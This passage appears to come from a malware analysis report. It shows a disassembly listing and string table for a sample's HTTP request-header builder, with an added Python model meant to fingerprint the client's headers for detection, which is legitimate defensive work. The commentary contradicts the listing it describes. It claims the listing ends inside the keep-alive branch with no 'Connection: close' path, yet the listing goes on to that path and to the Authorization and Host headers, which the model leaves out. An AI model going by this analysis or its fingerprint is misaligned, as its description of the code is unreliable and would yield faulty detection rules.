0040A7F4 retn 0004h function end
Strings
  • HTTPS, va: 0041DE54
  • Range: bytes=, va: 0041DEDC
  • Connection: close, va: 0041DF68
  • Host: , va: 0041DFF8
  • 0.9, va: 0041E02C
  • HTTP/, va: 0041E044
  • 1.1, va: 0041DE64
  • CONTENT-LENGTH:, va: 0041E070
  • CONTENT-TYPE:, va: 0041E088
  • TRANSFER-ENCODING:, va: 0041E0A0
  • CONNECTION:, va: 0041E0F8
  • CLOSE, va: 0041E0E8
  • PROXY-CONNECTION:, va: 0041E0CC
  • CHUNKED, va: 0041E0BC
  • HTTP/, va: 0041E054
  • ://, va: 0041E008
  • Proxy-Authorization: Basic , va: 0041DFB0
  • Authorization: Basic , va: 0041DF90
  • Connection: keep-alive, va: 0041DF30
  • Keep-Alive: , va: 0041DF50
  • Proxy-, va: 0041DF20
  • Cookie: , va: 0041DF0C
  • User-Agent: , va: 0041DEC4
  • Content-Length: , va: 0041DE90
  • Content-Type: , va: 0041DEAC
  • Expect: 100-continue, va: 0041DE70
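The function listed next (0041D0E8) assembles the outgoing HTTP request headers from the strings above: Expect, Content-Length and Content-Type, User-Agent, Range, Cookie, then the optionally Proxy-prefixed Connection and Keep-Alive lines, each written through the method at vtable offset 60h of the object at self+2Ch. The Python below is an added example, not code from the sample or from the sandbox report, that models that emission logic as read from the listing so the header set and order can serve as a wire fingerprint for this client. Field names are assumed from how each object offset is used, the two separator strings at 0041DEF4 and 0041DF00 are not shown on the page and are assumed to be "-" and "; ", and the listing ends inside the keep-alive branch, so nothing beyond the Keep-Alive line (and no Connection: close path) is modelled.

```python
"""Model of the request-header assembly in the function at 0041D0E8.

Added example, not code from the sample or the sandbox. Field names are assumed from how each
object offset is used; the two separator strings whose contents the listing does not show are
marked as assumptions below. The listing ends inside the keep-alive branch, so nothing after
the "Keep-Alive: " line is modelled.
"""
from dataclasses import dataclass, field

RANGE_SEP = "-"    # string at 0041DEF4 is not shown in the listing; assumed "-" (HTTP byte-range syntax)
COOKIE_SEP = "; "  # string at 0041DF00 is not shown in the listing; assumed "; " (Cookie header syntax)


@dataclass
class Request:
    scheme: str = "http"            # [ebp-1Ch] from the URL split at 0041D15D, upper-cased, compared with "HTTPS"
    proxy_server: str = ""          # self+48h
    version: str = "1.1"            # self+38h, compared with "1.1"
    body_size: int = 0              # Int64 returned by the stream object at self+30h
    content_type: str = ""          # self+34h
    user_agent: str = ""            # self+60h
    range_start: int = 0            # self+70h
    range_end: int = 0              # self+74h
    cookies: list = field(default_factory=list)  # items of the list object at self+64h
    keep_alive: bool = False        # byte at self+3Ch
    keep_alive_timeout: int = 0     # self+40h, rendered with the IntToStr helper at 004074CC
    expect_continue: bool = False   # byte at self+44h (purpose inferred from its use)


def build_headers(r):
    """Return the header lines in the order the function writes them via [vtable+60h]."""
    out = []
    is_https = r.scheme.upper() == "HTTPS"           # 0041D18A..0041D19C
    has_body = r.body_size > 0                       # 0041D262..0041D274
    # 0041D277..0041D2B2: flag AND body present AND protocol version "1.1"
    if r.expect_continue and has_body and r.version == "1.1":
        out.append("Expect: 100-continue")
    # 0041D2B5..0041D318
    if has_body:
        out.append(f"Content-Length: {r.body_size}")
        if r.content_type:
            out.append(f"Content-Type: {r.content_type}")
    # 0041D31B..0041D344
    if r.user_agent:
        out.append(f"User-Agent: {r.user_agent}")
    # 0041D347..0041D3DE: emitted when either bound is positive; open-ended when start > end
    if r.range_start > 0 or r.range_end > 0:
        if r.range_start <= r.range_end:
            out.append(f"Range: bytes={r.range_start}{RANGE_SEP}{r.range_end}")
        else:
            out.append(f"Range: bytes={r.range_start}{RANGE_SEP}")
    # 0041D3E1..0041D453: cookies concatenated, separator only when the accumulator is non-empty
    acc = ""
    for c in r.cookies:
        if acc:
            acc += COOKIE_SEP
        acc += c
    if acc:
        out.append(f"Cookie: {acc}")
    # 0041D244..0041D257 and 0041D456..0041D46C: "Proxy-" prefix only for a proxied non-HTTPS request
    prefix = "Proxy-" if (r.proxy_server and not is_https) else ""
    # 0041D471..0041D4BD; the listing stops right after "Keep-Alive: " is loaded, so the prefix on
    # that line is an assumption mirroring the Connection line
    if r.keep_alive:
        out.append(f"{prefix}Connection: keep-alive")
        out.append(f"{prefix}Keep-Alive: {r.keep_alive_timeout}")
    return out


def header_order(lines):
    """Header names in emission order: a stable fingerprint for matching this client on the wire."""
    return [ln.split(":", 1)[0] for ln in lines]


if __name__ == "__main__":
    req = Request(user_agent="Mozilla/4.0", body_size=27, content_type="application/x-www-form-urlencoded",
                  expect_continue=True, proxy_server="10.0.0.1", keep_alive=True, keep_alive_timeout=300,
                  cookies=["sid=abc", "lang=en"])
    for line in build_headers(req):
        print(line)
    print(header_order(build_headers(req)))
```

Two details are worth carrying into a detection rule: the Range header is only ever written with a positive start or end and becomes open-ended ("bytes=N-") when the start exceeds the end, and the Proxy- prefix is dropped for HTTPS because the proxy settings are pushed into the IO handler object (self+1Ch, offsets 204h..21Ch) instead of being expressed as headers.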
Address Instruction Meta Information
0041D0E8 push ebp xrefs 00428A68, 00428BB4, 00428F44, 00429104
0041D0E9 mov ebp, esp
0041D0EB push ecx
0041D0EC mov ecx, 0000001Eh
0041D0F3 push 00000000h Count = 2
0041D0F5 dec ecx
0041D0F6 jne 0041D0F1h
0041D0F8 xchg dword ptr [ebp-04h], ecx
0041D0FB push ebx
0041D0FC push esi
0041D0FD push edi
0041D0FE mov ebx, ecx
0041D100 mov dword ptr [ebp-08h], edx
0041D103 mov dword ptr [ebp-04h], eax
0041D106 xor eax, eax
0041D108 push ebp
0041D109 push 0041DE37h
0041D10E push dword ptr fs:[eax]
0041D111 mov dword ptr fs:[eax], esp
0041D114 mov byte ptr [ebp-09h], 00000000h
0041D118 mov eax, dword ptr [ebp-04h]
0041D11B mov dword ptr [eax+58h], 000001F4h
0041D122 mov eax, dword ptr [ebp-04h]
0041D125 add eax, 5Ch
0041D128 call 004043DCh
0041D12D mov eax, dword ptr [ebp-04h]
0041D130 xor edx, edx
0041D132 mov dword ptr [eax+68h], edx
0041D135 mov eax, dword ptr [ebp-04h]
0041D138 xor edx, edx
0041D13A mov dword ptr [eax+6Ch], edx
0041D13D lea eax, dword ptr [ebp-24h]
0041D140 push eax
0041D141 lea eax, dword ptr [ebp-28h]
0041D144 push eax
0041D145 lea eax, dword ptr [ebp-2Ch]
0041D148 push eax
0041D149 lea eax, dword ptr [ebp-30h]
0041D14C push eax
0041D14D lea eax, dword ptr [ebp-34h]
0041D150 push eax
0041D151 lea eax, dword ptr [ebp-38h]
0041D154 push eax
0041D155 lea ecx, dword ptr [ebp-20h]
0041D158 lea edx, dword ptr [ebp-1Ch]
0041D15B mov eax, ebx
0041D15D call 00415290h
0041D162 cmp dword ptr [ebp-20h], 00000000h
0041D166 jne 0041D184h
0041D168 lea eax, dword ptr [ebp-20h]
0041D16B mov edx, dword ptr [ebp-04h]
0041D16E mov edx, dword ptr [edx+14h]
0041D171 call 00404474h
0041D176 lea eax, dword ptr [ebp-24h]
0041D179 mov edx, dword ptr [ebp-04h]
0041D17C mov edx, dword ptr [edx+18h]
0041D17F call 00404474h
0041D184 lea edx, dword ptr [ebp-54h] xrefs 0041D166
0041D187 mov eax, dword ptr [ebp-1Ch]
0041D18A call 00407284h
0041D18F mov eax, dword ptr [ebp-54h]
0041D192 mov edx, 0041DE54h ASCII "HTTPS"
0041D197 call 004047C4h
0041D19C jne 0041D202h
0041D19E mov eax, dword ptr [ebp-04h]
0041D1A1 cmp dword ptr [eax+48h], 00000000h
0041D1A5 setne bl
0041D1A8 mov eax, dword ptr [ebp-04h]
0041D1AB mov eax, dword ptr [eax+1Ch]
0041D1AE add eax, 00000204h
0041D1B3 mov edx, dword ptr [ebp-04h]
0041D1B6 mov edx, dword ptr [edx+48h]
0041D1B9 call 00404430h
0041D1BE mov eax, dword ptr [ebp-04h]
0041D1C1 mov eax, dword ptr [eax+1Ch]
0041D1C4 add eax, 00000208h
0041D1C9 mov edx, dword ptr [ebp-04h]
0041D1CC mov edx, dword ptr [edx+4Ch]
0041D1CF call 00404430h
0041D1D4 mov eax, dword ptr [ebp-04h]
0041D1D7 mov eax, dword ptr [eax+1Ch]
0041D1DA add eax, 00000218h
0041D1DF mov edx, dword ptr [ebp-04h]
0041D1E2 mov edx, dword ptr [edx+50h]
0041D1E5 call 00404430h
0041D1EA mov eax, dword ptr [ebp-04h]
0041D1ED mov eax, dword ptr [eax+1Ch]
0041D1F0 add eax, 0000021Ch
0041D1F5 mov edx, dword ptr [ebp-04h]
0041D1F8 mov edx, dword ptr [edx+54h]
0041D1FB call 00404430h
0041D200 jmp 0041D244h
0041D202 xor ebx, ebx xrefs 0041D19C
0041D204 mov eax, dword ptr [ebp-04h]
0041D207 mov eax, dword ptr [eax+1Ch]
0041D20A add eax, 00000204h
0041D20F call 004043DCh
0041D214 mov eax, dword ptr [ebp-04h]
0041D217 mov eax, dword ptr [eax+1Ch]
0041D21A add eax, 00000208h
0041D21F call 004043DCh
0041D224 mov eax, dword ptr [ebp-04h]
0041D227 mov eax, dword ptr [eax+1Ch]
0041D22A add eax, 00000218h
0041D22F call 004043DCh
0041D234 mov eax, dword ptr [ebp-04h]
0041D237 mov eax, dword ptr [eax+1Ch]
0041D23A add eax, 0000021Ch
0041D23F call 004043DCh
0041D244 mov eax, dword ptr [ebp-04h] xrefs 0041D200
0041D247 cmp dword ptr [eax+48h], 00000000h
0041D24B je 0041D251h
0041D24D test bl, bl
0041D24F je 0041D255h
0041D251 xor eax, eax xrefs 0041D24B
0041D253 jmp 0041D257h
0041D255 mov al, 01h xrefs 0041D24F
0041D257 mov byte ptr [ebp-45h], al xrefs 0041D253
0041D25A mov eax, dword ptr [ebp-04h]
0041D25D mov eax, dword ptr [eax+30h]
0041D260 mov edx, dword ptr [eax]
0041D262 call dword ptr [edx]
0041D264 cmp edx, 00000000h
0041D267 jne 0041D271h
0041D269 cmp eax, 00000000h
0041D26C setnbe al
0041D26F jmp 0041D274h
0041D271 setnle al xrefs 0041D267
0041D274 mov byte ptr [ebp-0Ah], al xrefs 0041D26F
0041D277 mov eax, dword ptr [ebp-04h]
0041D27A mov al, byte ptr [eax+44h]
0041D27D and al, byte ptr [ebp-0Ah]
0041D280 je 0041D294h
0041D282 mov eax, dword ptr [ebp-04h]
0041D285 mov eax, dword ptr [eax+38h]
0041D288 mov edx, 0041DE64h ASCII "1.1"
0041D28D call 004047C4h
0041D292 je 0041D298h
0041D294 xor eax, eax xrefs 0041D280
0041D296 jmp 0041D29Ah
0041D298 mov al, 01h xrefs 0041D292
0041D29A mov byte ptr [ebp-0Bh], al xrefs 0041D296
0041D29D cmp byte ptr [ebp-0Bh], 00000000h
0041D2A1 je 0041D2B5h
0041D2A3 mov eax, dword ptr [ebp-04h]
0041D2A6 mov eax, dword ptr [eax+2Ch]
0041D2A9 mov ecx, 0041DE70h ASCII "Expect: 100-continue"
0041D2AE xor edx, edx
0041D2B0 mov ebx, dword ptr [eax]
0041D2B2 call dword ptr [ebx+60h]
0041D2B5 cmp byte ptr [ebp-0Ah], 00000000h xrefs 0041D2A1
0041D2B9 je 0041D31Bh
0041D2BB mov eax, dword ptr [ebp-04h]
0041D2BE mov eax, dword ptr [eax+30h]
0041D2C1 mov edx, dword ptr [eax]
0041D2C3 call dword ptr [edx]
0041D2C5 push edx
0041D2C6 push eax
0041D2C7 lea eax, dword ptr [ebp-5Ch]
0041D2CA call 004075B8h
0041D2CF mov ecx, dword ptr [ebp-5Ch]
0041D2D2 lea eax, dword ptr [ebp-58h]
0041D2D5 mov edx, 0041DE90h ASCII "Content-Length: "
0041D2DA call 004046C4h
0041D2DF mov ecx, dword ptr [ebp-58h]
0041D2E2 mov eax, dword ptr [ebp-04h]
0041D2E5 mov eax, dword ptr [eax+2Ch]
0041D2E8 xor edx, edx
0041D2EA mov ebx, dword ptr [eax]
0041D2EC call dword ptr [ebx+60h]
0041D2EF mov eax, dword ptr [ebp-04h]
0041D2F2 cmp dword ptr [eax+34h], 00000000h
0041D2F6 je 0041D31Bh
0041D2F8 mov eax, dword ptr [ebp-04h]
0041D2FB mov ecx, dword ptr [eax+34h]
0041D2FE lea eax, dword ptr [ebp-60h]
0041D301 mov edx, 0041DEACh ASCII "Content-Type: "
0041D306 call 004046C4h
0041D30B mov ecx, dword ptr [ebp-60h]
0041D30E mov eax, dword ptr [ebp-04h]
0041D311 mov eax, dword ptr [eax+2Ch]
0041D314 xor edx, edx
0041D316 mov ebx, dword ptr [eax]
0041D318 call dword ptr [ebx+60h]
0041D31B mov eax, dword ptr [ebp-04h] xrefs 0041D2B9, 0041D2F6
0041D31E cmp dword ptr [eax+60h], 00000000h
0041D322 je 0041D347h
0041D324 mov eax, dword ptr [ebp-04h]
0041D327 mov ecx, dword ptr [eax+60h]
0041D32A lea eax, dword ptr [ebp-64h]
0041D32D mov edx, 0041DEC4h ASCII "User-Agent: "
0041D332 call 004046C4h
0041D337 mov ecx, dword ptr [ebp-64h]
0041D33A mov eax, dword ptr [ebp-04h]
0041D33D mov eax, dword ptr [eax+2Ch]
0041D340 xor edx, edx
0041D342 mov ebx, dword ptr [eax]
0041D344 call dword ptr [ebx+60h]
0041D347 mov eax, dword ptr [ebp-04h] xrefs 0041D322
0041D34A mov ebx, dword ptr [eax+70h]
0041D34D test ebx, ebx
0041D34F jnle 0041D35Eh
0041D351 mov eax, dword ptr [ebp-04h]
0041D354 cmp dword ptr [eax+74h], 00000000h
0041D358 jng 0041D3E1h
0041D35E mov eax, dword ptr [ebp-04h] xrefs 0041D34F
0041D361 cmp ebx, dword ptr [eax+74h]
0041D364 jnle 0041D3ADh
0041D366 push 0041DEDCh ASCII "Range: bytes="
0041D36B lea edx, dword ptr [ebp-6Ch]
0041D36E mov eax, ebx
0041D370 call 004074CCh
0041D375 push dword ptr [ebp-6Ch]
0041D378 push 0041DEF4h
0041D37D lea edx, dword ptr [ebp-70h]
0041D380 mov eax, dword ptr [ebp-04h]
0041D383 mov eax, dword ptr [eax+74h]
0041D386 call 004074CCh
0041D38B push dword ptr [ebp-70h]
0041D38E lea eax, dword ptr [ebp-68h]
0041D391 mov edx, 00000004h
0041D396 call 00404738h
0041D39B mov ecx, dword ptr [ebp-68h]
0041D39E mov eax, dword ptr [ebp-04h]
0041D3A1 mov eax, dword ptr [eax+2Ch]
0041D3A4 xor edx, edx
0041D3A6 mov ebx, dword ptr [eax]
0041D3A8 call dword ptr [ebx+60h]
0041D3AB jmp 0041D3E1h
0041D3AD push 0041DEDCh ASCII "Range: bytes=" xrefs 0041D364
0041D3B2 lea edx, dword ptr [ebp-78h]
0041D3B5 mov eax, ebx
0041D3B7 call 004074CCh
0041D3BC push dword ptr [ebp-78h]
0041D3BF push 0041DEF4h
0041D3C4 lea eax, dword ptr [ebp-74h]
0041D3C7 mov edx, 00000003h
0041D3CC call 00404738h
0041D3D1 mov ecx, dword ptr [ebp-74h]
0041D3D4 mov eax, dword ptr [ebp-04h]
0041D3D7 mov eax, dword ptr [eax+2Ch]
0041D3DA xor edx, edx
0041D3DC mov ebx, dword ptr [eax]
0041D3DE call dword ptr [ebx+60h]
0041D3E1 lea eax, dword ptr [ebp-3Ch] xrefs 0041D3AB, 0041D358
0041D3E4 call 004043DCh
0041D3E9 mov eax, dword ptr [ebp-04h]
0041D3EC mov eax, dword ptr [eax+64h]
0041D3EF mov edx, dword ptr [eax]
0041D3F1 call dword ptr [edx+14h]
0041D3F4 mov ebx, eax
0041D3F6 dec ebx
0041D3F7 test ebx, ebx
0041D3F9 jl 0041D430h
0041D3FB inc ebx
0041D3FC xor esi, esi
0041D3FE cmp dword ptr [ebp-3Ch], 00000000h xrefs 0041D42E
0041D402 je 0041D411h
0041D404 lea eax, dword ptr [ebp-3Ch]
0041D407 mov edx, 0041DF00h
0041D40C call 00404680h
0041D411 lea ecx, dword ptr [ebp-7Ch] xrefs 0041D402
0041D414 mov eax, dword ptr [ebp-04h]
0041D417 mov eax, dword ptr [eax+64h]
0041D41A mov edx, esi
0041D41C mov edi, dword ptr [eax]
0041D41E call dword ptr [edi+0Ch]
0041D421 mov edx, dword ptr [ebp-7Ch]
0041D424 lea eax, dword ptr [ebp-3Ch]
0041D427 call 00404680h
0041D42C inc esi
0041D42D dec ebx
0041D42E jne 0041D3FEh
0041D430 cmp dword ptr [ebp-3Ch], 00000000h xrefs 0041D3F9
0041D434 je 0041D456h
0041D436 lea eax, dword ptr [ebp-80h]
0041D439 mov ecx, dword ptr [ebp-3Ch]
0041D43C mov edx, 0041DF0Ch ASCII "Cookie: "
0041D441 call 004046C4h
0041D446 mov ecx, dword ptr [ebp-80h]
0041D449 mov eax, dword ptr [ebp-04h]
0041D44C mov eax, dword ptr [eax+2Ch]
0041D44F xor edx, edx
0041D451 mov ebx, dword ptr [eax]
0041D453 call dword ptr [ebx+60h]
0041D456 lea eax, dword ptr [ebp-44h] xrefs 0041D434
0041D459 call 004043DCh
0041D45E cmp byte ptr [ebp-45h], 00000000h
0041D462 je 0041D471h
0041D464 lea eax, dword ptr [ebp-44h]
0041D467 mov edx, 0041DF20h ASCII "Proxy-"
0041D46C call 00404474h
0041D471 mov eax, dword ptr [ebp-04h] xrefs 0041D462
0041D474 cmp byte ptr [eax+3Ch], 00000000h
0041D478 je 0041D4DCh
0041D47A lea eax, dword ptr [ebp-00000084h]
0041D480 mov ecx, 0041DF30h ASCII "Connection: keep-alive"
0041D485 mov edx, dword ptr [ebp-44h]
0041D488 call 004046C4h
0041D48D mov ecx, dword ptr [ebp-00000084h]
0041D493 mov eax, dword ptr [ebp-04h]
0041D496 mov eax, dword ptr [eax+2Ch]
0041D499 xor edx, edx
0041D49B mov ebx, dword ptr [eax]
0041D49D call dword ptr [ebx+60h]
0041D4A0 lea edx, dword ptr [ebp-0000008Ch]
0041D4A6 mov eax, dword ptr [ebp-04h]
0041D4A9 mov eax, dword ptr [eax+40h]
0041D4AC call 004074CCh
0041D4B1 mov ecx, dword ptr [ebp-0000008Ch]
0041D4B7 lea eax, dword ptr [ebp-00000088h]
0041D4BD mov edx, 0041DF50h ASCII "Keep-Alive: "
0041D4C2 call 004046C4h
0041D4C7 mov ecx, dword ptr [ebp-00000088h]
0041D4CD mov eax, dword ptr [ebp-04h]
0041D4D0 mov eax, dword ptr [eax+2Ch]
0041D4D3 xor edx, edx
0041D4D5 mov ebx, dword ptr [eax]
0041D4D7 call dword ptr [ebx+60h]
0041D4DA jmp 0041D502h
0041D4DC lea eax, dword ptr [ebp-00000090h] xrefs 0041D478
0041D4E2 mov ecx, 0041DF68h ASCII "Connection: close"
0041D4E7 mov edx, dword ptr [ebp-44h]
0041D4EA call 004046C4h
0041D4EF mov ecx, dword ptr [ebp-00000090h]
0041D4F5 mov eax, dword ptr [ebp-04h]
0041D4F8 mov eax, dword ptr [eax+2Ch]
0041D4FB xor edx, edx
0041D4FD mov ebx, dword ptr [eax]
0041D4FF call dword ptr [ebx+60h]
0041D502 cmp dword ptr [ebp-20h], 00000000h xrefs 0041D4DA
0041D506 je 0041D55Dh
0041D508 push dword ptr [ebp-20h]
0041D50B push 0041DF84h
0041D510 push dword ptr [ebp-24h]
0041D513 lea eax, dword ptr [ebp-0000009Ch]
0041D519 mov edx, 00000003h
0041D51E call 00404738h
0041D523 mov eax, dword ptr [ebp-0000009Ch]
0041D529 lea edx, dword ptr [ebp-00000098h]
0041D52F call 00415E2Ch
0041D534 mov ecx, dword ptr [ebp-00000098h]
0041D53A lea eax, dword ptr [ebp-00000094h]
0041D540 mov edx, 0041DF90h ASCII "Authorization: Basic "
0041D545 call 004046C4h
0041D54A mov ecx, dword ptr [ebp-00000094h]
0041D550 mov eax, dword ptr [ebp-04h]
0041D553 mov eax, dword ptr [eax+2Ch]
0041D556 xor edx, edx
0041D558 mov ebx, dword ptr [eax]
0041D55A call dword ptr [ebx+60h]
0041D55D cmp byte ptr [ebp-45h], 00000000h xrefs 0041D506
0041D561 je 0041D5C7h
0041D563 mov eax, dword ptr [ebp-04h]
0041D566 cmp dword ptr [eax+50h], 00000000h
0041D56A je 0041D5C7h
0041D56C mov eax, dword ptr [ebp-04h]
0041D56F push dword ptr [eax+50h]
0041D572 push 0041DF84h
0041D577 mov eax, dword ptr [ebp-04h]
0041D57A push dword ptr [eax+54h]
0041D57D lea eax, dword ptr [ebp-000000A8h]
0041D583 mov edx, 00000003h
0041D588 call 00404738h
0041D58D mov eax, dword ptr [ebp-000000A8h]
0041D593 lea edx, dword ptr [ebp-000000A4h]
0041D599 call 00415E2Ch
0041D59E mov ecx, dword ptr [ebp-000000A4h]
0041D5A4 lea eax, dword ptr [ebp-000000A0h]
0041D5AA mov edx, 0041DFB0h ASCII "Proxy-Authorization: Basic "
0041D5AF call 004046C4h
0041D5B4 mov ecx, dword ptr [ebp-000000A0h]
0041D5BA mov eax, dword ptr [ebp-04h]
0041D5BD mov eax, dword ptr [eax+2Ch]
0041D5C0 xor edx, edx
0041D5C2 mov ebx, dword ptr [eax]
0041D5C4 call dword ptr [ebx+60h]
0041D5C7 mov eax, dword ptr [ebp-28h] xrefs 0041D561, 0041D56A
0041D5CA call 00415FD8h
0041D5CF test al, al
0041D5D1 je 0041D5EFh
0041D5D3 push 0041DFD4h
0041D5D8 push dword ptr [ebp-28h]
0041D5DB push 0041DFE0h
0041D5E0 lea eax, dword ptr [ebp-3Ch]
0041D5E3 mov edx, 00000003h
0041D5E8 call 00404738h
0041D5ED jmp 0041D5FAh
0041D5EF lea eax, dword ptr [ebp-3Ch] xrefs 0041D5D1
0041D5F2 mov edx, dword ptr [ebp-28h]
0041D5F5 call 00404474h
0041D5FA mov eax, dword ptr [ebp-04h] xrefs 0041D5ED
0041D5FD cmp byte ptr [eax+78h], 00000000h
0041D601 je 0041D647h
0041D603 mov eax, dword ptr [ebp-2Ch]
0041D606 mov edx, 0041DFECh
0041D60B call 004047C4h
0041D610 je 0041D647h
0041D612 push 0041DFF8h ASCII "Host: "
0041D617 push dword ptr [ebp-3Ch]
0041D61A push 0041DF84h
0041D61F push dword ptr [ebp-2Ch]
0041D622 lea eax, dword ptr [ebp-000000ACh]
0041D628 mov edx, 00000004h
0041D62D call 00404738h
0041D632 mov ecx, dword ptr [ebp-000000ACh]
0041D638 mov eax, dword ptr [ebp-04h]
0041D63B mov eax, dword ptr [eax+2Ch]
0041D63E xor edx, edx
0041D640 mov ebx, dword ptr [eax]
0041D642 call dword ptr [ebx+60h]
0041D645 jmp 0041D66Dh
0041D647 lea eax, dword ptr [ebp-000000B0h] xrefs 0041D601, 0041D610
0041D64D mov ecx, dword ptr [ebp-3Ch]
0041D650 mov edx, 0041DFF8h ASCII "Host: "
0041D655 call 004046C4h
0041D65A mov ecx, dword ptr [ebp-000000B0h]
0041D660 mov eax, dword ptr [ebp-04h]
0041D663 mov eax, dword ptr [eax+2Ch]
0041D666 xor edx, edx
0041D668 mov ebx, dword ptr [eax]
0041D66A call dword ptr [ebx+60h]
0041D66D cmp byte ptr [ebp-45h], 00000000h xrefs 0041D645
0041D671 je 0041D696h
0041D673 push dword ptr [ebp-1Ch]
0041D676 push 0041E008h ASCII "://"
0041D67B push dword ptr [ebp-3Ch]
0041D67E push 0041DF84h
0041D683 push dword ptr [ebp-2Ch]
0041D686 push dword ptr [ebp-38h]
0041D689 lea eax, dword ptr [ebp-38h]
0041D68C mov edx, 00000006h
0041D691 call 00404738h
0041D696 mov eax, dword ptr [ebp-38h] xrefs 0041D671
0041D699 mov edx, 0041E014h
0041D69E call 004047C4h
0041D6A3 jne 0041D6B2h
0041D6A5 lea eax, dword ptr [ebp-38h]
0041D6A8 mov edx, 0041E020h
0041D6AD call 00404474h
0041D6B2 mov eax, dword ptr [ebp-04h] xrefs 0041D6A3
0041D6B5 mov eax, dword ptr [eax+38h]
0041D6B8 mov edx, 0041E02Ch ASCII "0.9"
0041D6BD call 004047C4h
0041D6C2 jne 0041D705h
0041D6C4 lea edx, dword ptr [ebp-000000B8h]
0041D6CA mov eax, dword ptr [ebp-08h]
0041D6CD call 00407284h
0041D6D2 push dword ptr [ebp-000000B8h]
0041D6D8 push 0041E038h
0041D6DD push dword ptr [ebp-38h]
0041D6E0 lea eax, dword ptr [ebp-000000B4h]
0041D6E6 mov edx, 00000003h
0041D6EB call 00404738h
0041D6F0 mov ecx, dword ptr [ebp-000000B4h]
0041D6F6 mov eax, dword ptr [ebp-04h]
0041D6F9 mov eax, dword ptr [eax+2Ch]
0041D6FC xor edx, edx
0041D6FE mov ebx, dword ptr [eax]
0041D700 call dword ptr [ebx+60h]
0041D703 jmp 0041D74Fh
0041D705 lea edx, dword ptr [ebp-000000C0h] xrefs 0041D6C2
0041D70B mov eax, dword ptr [ebp-08h]
0041D70E call 00407284h
0041D713 push dword ptr [ebp-000000C0h]
0041D719 push 0041E038h
0041D71E push dword ptr [ebp-38h]
0041D721 push 0041E044h ASCII " HTTP/"
0041D726 mov eax, dword ptr [ebp-04h]
0041D729 push dword ptr [eax+38h]
0041D72C lea eax, dword ptr [ebp-000000BCh]
0041D732 mov edx, 00000005h
0041D737 call 00404738h
0041D73C mov ecx, dword ptr [ebp-000000BCh]
0041D742 mov eax, dword ptr [ebp-04h]
0041D745 mov eax, dword ptr [eax+2Ch]
0041D748 xor edx, edx
0041D74A mov ebx, dword ptr [eax]
0041D74C call dword ptr [ebx+60h]
0041D74F cmp byte ptr [ebp-45h], 00000000h xrefs 0041D703
0041D753 je 0041D779h
0041D755 mov eax, dword ptr [ebp-04h]
0041D758 add eax, 04h
0041D75B mov edx, dword ptr [ebp-04h]
0041D75E mov edx, dword ptr [edx+48h]
0041D761 call 00404430h
0041D766 mov eax, dword ptr [ebp-04h]
0041D769 add eax, 08h
0041D76C mov edx, dword ptr [ebp-04h]
0041D76F mov edx, dword ptr [edx+4Ch]
0041D772 call 00404430h
0041D777 jmp 0041D795h
0041D779 mov eax, dword ptr [ebp-04h] xrefs 0041D753
0041D77C add eax, 04h
0041D77F mov edx, dword ptr [ebp-28h]
0041D782 call 00404430h
0041D787 mov eax, dword ptr [ebp-04h]
0041D78A add eax, 08h
0041D78D mov edx, dword ptr [ebp-2Ch]
0041D790 call 00404430h
0041D795 mov eax, dword ptr [ebp-04h] xrefs 0041D777
0041D798 mov ebx, dword ptr [eax+2Ch]
0041D79B mov eax, ebx
0041D79D mov edx, dword ptr [eax]
0041D79F call dword ptr [edx+14h]
0041D7A2 mov edx, eax
0041D7A4 dec edx
0041D7A5 lea ecx, dword ptr [ebp-000000C4h]
0041D7AB mov eax, ebx
0041D7AD mov ebx, dword ptr [eax]
0041D7AF call dword ptr [ebx+0Ch]
0041D7B2 cmp dword ptr [ebp-000000C4h], 00000000h
0041D7B9 je 0041D7C8h
0041D7BB mov eax, dword ptr [ebp-04h]
0041D7BE mov eax, dword ptr [eax+2Ch]
0041D7C1 xor edx, edx
0041D7C3 mov ecx, dword ptr [eax]
0041D7C5 call dword ptr [ecx+38h]
0041D7C8 lea edx, dword ptr [ebp-000000C8h] xrefs 0041D7B9
0041D7CE mov eax, dword ptr [ebp-1Ch]
0041D7D1 call 00407284h
0041D7D6 mov eax, dword ptr [ebp-000000C8h]
0041D7DC mov edx, 0041DE54h ASCII "HTTPS"
0041D7E1 call 004047C4h
0041D7E6 sete dl
0041D7E9 mov eax, dword ptr [ebp-04h]
0041D7EC call 0041D08Ch
0041D7F1 test al, al
0041D7F3 jne 0041D810h
0041D7F5 mov eax, dword ptr [ebp-04h]
0041D7F8 add eax, 24h
0041D7FB call 004043DCh
0041D800 mov eax, dword ptr [ebp-04h]
0041D803 add eax, 28h
0041D806 call 004043DCh
0041D80B jmp 0041DE04h
0041D812 push 00000000h Count = 2
0041D814 mov eax, dword ptr [ebp-04h]
0041D817 mov eax, dword ptr [eax+30h]
0041D81A call 00411F4Ch
0041D81F lea eax, dword ptr [ebp-10h]
0041D822 call 004043DCh
0041D827 cmp byte ptr [ebp-0Bh], 00000000h
0041D82B je 0041D91Eh
0041D831 lea edx, dword ptr [ebp-000000CCh]
0041D837 mov eax, dword ptr [ebp-04h]
0041D83A call 0041CF78h
0041D83F mov edx, dword ptr [ebp-000000CCh]
0041D845 mov eax, dword ptr [ebp-04h]
0041D848 mov eax, dword ptr [eax+1Ch]
0041D84B mov ecx, dword ptr [eax]
0041D84D call dword ptr [ecx+24h]
0041D850 mov eax, dword ptr [ebp-04h]
0041D853 mov eax, dword ptr [eax+1Ch]
0041D856 cmp dword ptr [eax+000001B8h], 00000000h
0041D85D jne 0041DE04h
0041D863 lea ecx, dword ptr [ebp-3Ch] xrefs 0041D88A
0041D866 mov eax, dword ptr [ebp-04h]
0041D869 mov edx, dword ptr [eax+10h]
0041D86C mov eax, dword ptr [ebp-04h]
0041D86F mov eax, dword ptr [eax+1Ch]
0041D872 mov ebx, dword ptr [eax]
0041D874 call dword ptr [ebx+50h]
0041D877 cmp dword ptr [ebp-3Ch], 00000000h
0041D87B jne 0041D88Ch
0041D87D mov eax, dword ptr [ebp-04h]
0041D880 mov eax, dword ptr [eax+1Ch]
0041D883 cmp dword ptr [eax+000001B8h], 00000000h
0041D88A je 0041D863h
0041D88C mov edx, dword ptr [ebp-3Ch] xrefs 0041D87B
0041D88F mov eax, dword ptr [ebp-04h]
0041D892 call 0041CEA8h
0041D897 lea eax, dword ptr [ebp-10h]
0041D89A mov edx, dword ptr [ebp-3Ch]
0041D89D call 00404474h
0041D8A2 lea ecx, dword ptr [ebp-3Ch] xrefs 0041D8C9
0041D8A5 mov eax, dword ptr [ebp-04h]
0041D8A8 mov edx, dword ptr [eax+10h]
0041D8AB mov eax, dword ptr [ebp-04h]
0041D8AE mov eax, dword ptr [eax+1Ch]
0041D8B1 mov ebx, dword ptr [eax]
